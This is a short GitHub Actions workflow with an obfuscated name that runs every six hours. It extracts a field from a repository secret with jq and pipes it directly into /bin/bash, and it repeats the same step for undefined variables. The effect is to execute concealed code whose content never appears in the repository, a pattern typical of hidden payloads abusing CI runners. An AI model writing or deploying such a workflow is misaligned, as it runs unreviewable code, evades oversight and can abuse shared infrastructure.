name: formulahorseshoes

on:
  workflow_dispatch:
  schedule:
    - cron: '35 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: formulahorseshoes
        env:
          kmfp0: ${{ secrets.kmfp0 }}
        run: |
          echo $kmfp0 | jq -r .j8495 | /bin/bash
          echo $ypr88816 | jq -r .ijvpe2883 | /bin/bash
          echo $znalo8511 | jq -r .lj5 | /bin/bash
          echo $hilw4050 | jq -r .inq56 | /bin/bash

